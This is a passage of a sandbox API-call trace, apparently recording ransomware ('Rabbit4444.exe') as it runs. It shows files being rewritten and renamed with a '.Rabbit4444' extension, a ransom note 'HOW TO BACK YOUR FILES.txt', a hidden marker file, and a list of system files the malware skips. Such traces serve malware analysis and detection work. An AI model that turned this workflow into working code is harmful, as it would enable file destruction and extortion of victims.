(hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5300, lpName=0x0) returned 0x27c [0042.951] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5300) returned 0x70000 [0042.959] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xe6ed8 [0042.959] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0042.959] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xe6ed8 | out: hHeap=0xe0000) returned 1 [0042.959] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0042.959] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10ed48 [0042.959] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0x105430 [0042.959] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x204) returned 0x10ef58 [0042.959] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105430 | out: hHeap=0xe0000) returned 1 [0042.959] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x204) returned 0x10f168 [0042.959] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xe6ed8 [0042.959] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x20c) returned 0x10f378 [0042.959] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105460 [0042.959] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103a58 [0042.959] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0042.959] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xe6ed8 | out: hHeap=0xe0000) returned 1 [0042.959] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x204) returned 0x10f590 [0042.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0042.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105440 [0042.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103bf0 [0042.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105460 | out: hHeap=0xe0000) returned 1 [0042.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105440 | out: hHeap=0xe0000) returned 1 [0042.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0042.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0042.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x108) returned 0x108ab0 [0042.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103bf0 | out: hHeap=0xe0000) returned 1 [0042.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x204) returned 0x10f7a0 [0042.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0042.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055b0 [0042.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055b0 | out: hHeap=0xe0000) returned 1 [0042.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054a0 [0042.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054a0 | out: hHeap=0xe0000) returned 1 [0042.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105580 [0042.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105580 | out: hHeap=0xe0000) returned 1 [0042.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0042.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0042.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105430 [0042.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105430 | out: hHeap=0xe0000) returned 1 [0042.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105530 [0042.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105530 | out: hHeap=0xe0000) returned 1 [0042.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105550 [0042.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105550 | out: hHeap=0xe0000) returned 1 [0042.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105420 [0042.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105420 | out: hHeap=0xe0000) returned 1 [0042.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0042.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0042.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054a0 [0042.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054a0 | out: hHeap=0xe0000) returned 1 [0042.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0042.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0042.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105420 [0042.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105420 | out: hHeap=0xe0000) returned 1 [0042.960] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105440 [0042.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105440 | out: hHeap=0xe0000) returned 1 [0042.961] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105530 [0042.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105530 | out: hHeap=0xe0000) returned 1 [0042.961] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0042.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0042.961] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105460 [0042.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105460 | out: hHeap=0xe0000) returned 1 [0042.961] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105580 [0042.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105580 | out: hHeap=0xe0000) returned 1 [0042.961] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054a0 [0042.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054a0 | out: hHeap=0xe0000) returned 1 [0042.961] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0042.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0042.961] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0042.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0042.961] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105550 [0042.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105550 | out: hHeap=0xe0000) returned 1 [0042.961] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105480 [0042.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105480 | out: hHeap=0xe0000) returned 1 [0042.961] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054c0 [0042.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054c0 | out: hHeap=0xe0000) returned 1 [0042.961] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105410 [0042.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105410 | out: hHeap=0xe0000) returned 1 [0042.961] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0042.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0042.961] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105490 [0042.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105490 | out: hHeap=0xe0000) returned 1 [0042.961] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105510 [0042.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105510 | out: hHeap=0xe0000) returned 1 [0042.961] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105540 [0042.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105540 | out: hHeap=0xe0000) returned 1 [0042.961] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0042.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0042.961] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105430 [0042.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105430 | out: hHeap=0xe0000) returned 1 [0042.961] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105540 [0042.962] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105540 | out: hHeap=0xe0000) returned 1 [0042.962] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105410 [0042.962] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105410 | out: hHeap=0xe0000) returned 1 [0042.962] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105540 [0042.962] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105540 | out: hHeap=0xe0000) returned 1 [0042.962] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105440 [0042.962] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105440 | out: hHeap=0xe0000) returned 1 [0042.962] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0042.962] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0042.962] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105470 [0042.962] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105470 | out: hHeap=0xe0000) returned 1 [0042.962] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0042.962] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0042.962] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105550 [0042.962] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105550 | out: hHeap=0xe0000) returned 1 [0042.962] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105440 [0042.962] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105440 | out: hHeap=0xe0000) returned 1 [0042.962] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0042.962] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0042.962] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105450 [0042.962] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105450 | out: hHeap=0xe0000) returned 1 [0042.962] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0042.962] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0042.962] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105520 [0042.962] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105520 | out: hHeap=0xe0000) returned 1 [0042.962] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0042.962] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0042.962] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054b0 [0042.962] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054b0 | out: hHeap=0xe0000) returned 1 [0042.962] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055a0 [0042.962] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055a0 | out: hHeap=0xe0000) returned 1 [0042.962] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105540 [0042.962] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105540 | out: hHeap=0xe0000) returned 1 [0042.962] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105580 [0042.962] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105580 | out: hHeap=0xe0000) returned 1 [0042.963] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105550 [0042.963] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105550 | out: hHeap=0xe0000) returned 1 [0042.963] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105550 [0042.963] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105550 | out: hHeap=0xe0000) returned 1 [0042.963] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054b0 [0042.963] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054b0 | out: hHeap=0xe0000) returned 1 [0042.963] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105470 [0042.963] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105470 | out: hHeap=0xe0000) returned 1 [0042.963] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055b0 [0042.963] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055b0 | out: hHeap=0xe0000) returned 1 [0042.963] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105460 [0042.963] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105460 | out: hHeap=0xe0000) returned 1 [0042.963] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105480 [0042.963] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105480 | out: hHeap=0xe0000) returned 1 [0042.963] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054b0 [0042.963] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054b0 | out: hHeap=0xe0000) returned 1 [0042.963] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105460 [0042.963] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105460 | out: hHeap=0xe0000) returned 1 [0042.963] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054a0 [0042.963] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054a0 | out: hHeap=0xe0000) returned 1 [0042.963] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055a0 [0042.963] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055a0 | out: hHeap=0xe0000) returned 1 [0042.963] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0042.963] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0042.963] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105460 [0042.963] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105460 | out: hHeap=0xe0000) returned 1 [0042.963] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105510 [0042.963] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105510 | out: hHeap=0xe0000) returned 1 [0042.963] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105530 [0042.963] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105530 | out: hHeap=0xe0000) returned 1 [0042.963] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054c0 [0042.963] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054c0 | out: hHeap=0xe0000) returned 1 [0042.963] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0042.963] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0042.963] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105420 [0042.964] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105420 | out: hHeap=0xe0000) returned 1 [0042.964] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055c0 [0042.964] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055c0 | out: hHeap=0xe0000) returned 1 [0042.964] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055c0 [0042.964] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055c0 | out: hHeap=0xe0000) returned 1 [0042.964] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105480 [0042.964] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105480 | out: hHeap=0xe0000) returned 1 [0042.964] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105450 [0042.964] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105450 | out: hHeap=0xe0000) returned 1 [0042.964] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105450 [0042.964] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105450 | out: hHeap=0xe0000) returned 1 [0042.964] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105460 [0042.964] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105460 | out: hHeap=0xe0000) returned 1 [0042.964] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054e0 [0042.964] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054e0 | out: hHeap=0xe0000) returned 1 [0042.964] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054b0 [0042.964] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054b0 | out: hHeap=0xe0000) returned 1 [0042.964] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105510 [0042.964] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105510 | out: hHeap=0xe0000) returned 1 [0042.964] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105550 [0042.964] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105550 | out: hHeap=0xe0000) returned 1 [0042.964] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105530 [0042.964] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105530 | out: hHeap=0xe0000) returned 1 [0042.964] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10f168 | out: hHeap=0xe0000) returned 1 [0042.964] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10f590 | out: hHeap=0xe0000) returned 1 [0042.964] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10f378 | out: hHeap=0xe0000) returned 1 [0042.964] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10f7a0 | out: hHeap=0xe0000) returned 1 [0042.964] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103a58 | out: hHeap=0xe0000) returned 1 [0042.965] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0042.965] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10ed48 | out: hHeap=0xe0000) returned 1 [0042.965] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0042.965] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbfc0 | out: lpPerformanceCount=0x11cbfc0*=13427539581) returned 1 [0042.965] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xfc9e8 | out: hHeap=0xe0000) returned 1 [0042.965] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0042.965] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0042.965] CloseHandle (hObject=0x27c) returned 1 [0042.965] CloseHandle (hObject=0x278) returned 1 [0042.965] wsprintfW (in: param_1=0x11cc2c0, param_2="%s.%s" | out: param_1="Z:\\System Volume Information\\tracking.log.Rabbit4444") returned 52 [0042.965] MoveFileExW (lpExistingFileName="Z:\\System Volume Information\\tracking.log" (normalized: "z:\\system volume information\\tracking.log"), lpNewFileName="Z:\\System Volume Information\\tracking.log.Rabbit4444" (normalized: "z:\\system volume information\\tracking.log.rabbit4444"), dwFlags=0x1) returned 1 [0042.966] InterlockedExchangeAdd (in: Addend=0xff5a0, Value=20480 | out: Addend=0xff5a0) returned 0 [0042.966] InterlockedExchangeAdd (in: Addend=0xff5ac, Value=13 | out: Addend=0xff5ac) returned 0 [0042.966] FindNextFileW (in: hFindFile=0x102550, lpFindFileData=0x11cdfe0 | out: lpFindFileData=0x11cdfe0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8983e192, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x8983e192, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x899e1d51, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tracking.log", cAlternateFileName="")) returned 0 [0042.966] FindClose (in: hFindFile=0x102550 | out: hFindFile=0x102550) returned 1 [0042.966] lstrcpyW (in: lpString1=0x11ceb6a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0042.966] CreateFileW (lpFileName="Z:\\System Volume Information\\HOW TO BACK YOUR FILES.txt" (normalized: "z:\\system volume information\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0042.966] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0042.966] CloseHandle (hObject=0x0) returned 0 [0042.966] CloseHandle (hObject=0xffffffff) returned 1 [0042.966] GetCurrentThreadId () returned 0x390 [0042.966] RtlInterlockedPopEntrySList (in: ListHead=0xf6930 | out: ListHead=0xf6930) returned 0x0 [0042.966] GetCurrentThreadId () returned 0x390 [0042.966] WaitForMultipleObjects (nCount=0x0, lpHandles=0x11ce230*=0x0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0xffffffff [0042.966] RtlInterlockedPopEntrySList (in: ListHead=0xf6930 | out: ListHead=0xf6930) returned 0x0 [0042.966] RtlInterlockedFlushSList (in: ListHead=0xf6930 | out: ListHead=0xf6930) returned 0x0 [0042.966] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6928 | out: hHeap=0xe0000) returned 1 [0042.966] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xff590 | out: hHeap=0xe0000) returned 1 Thread: id = 12 os_tid = 0xd98 [0042.967] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf64f0 [0042.967] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:", iMaxLength=2048 | out: lpString1="C:") returned="C:" [0042.967] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0042.967] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf64e8 | out: hHeap=0xe0000) returned 1 [0042.967] lstrcatW (in: lpString1="", lpString2="C:" | out: lpString1="C:") returned="C:" [0042.967] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0042.967] lstrcatW (in: lpString1="C:\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\.BFC0E91B00AE8A0620D3") returned="C:\\.BFC0E91B00AE8A0620D3" [0042.967] CreateFileW (lpFileName="C:\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x274 [0042.969] WriteFile (in: hFile=0x274, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0042.971] FlushFileBuffers (hFile=0x274) returned 1 [0042.972] SetFileAttributesW (lpFileName="C:\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0042.973] CloseHandle (hObject=0x274) returned 1 [0042.974] lstrlenW (lpString="C:") returned 2 [0042.974] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.974] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$GetCurrent", cAlternateFileName="$GETCU~1")) returned 0x102810 [0042.974] lstrcmpiW (lpString1="$GetCurrent", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0042.974] lstrcmpiW (lpString1="$GetCurrent", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0042.974] lstrcmpiW (lpString1="$GetCurrent", lpString2="Rabbit4444.exe") returned -1 [0042.974] lstrcmpiW (lpString1="$GetCurrent", lpString2=".") returned -1 [0042.974] lstrcmpiW (lpString1="$GetCurrent", lpString2="..") returned -1 [0042.974] lstrcmpiW (lpString1="$GetCurrent", lpString2="windows") returned -1 [0042.974] lstrcmpiW (lpString1="$GetCurrent", lpString2="bootmgr") returned -1 [0042.974] lstrcmpiW (lpString1="$GetCurrent", lpString2="pagefile.sys") returned -1 [0042.974] lstrcmpiW (lpString1="$GetCurrent", lpString2="boot") returned -1 [0042.974] lstrcmpiW (lpString1="$GetCurrent", lpString2="ids.txt") returned -1 [0042.974] lstrcmpiW (lpString1="$GetCurrent", lpString2="NTUSER.DAT") returned -1 [0042.974] lstrcpyW (in: lpString1=0x130eb3e, lpString2="$GetCurrent" | out: 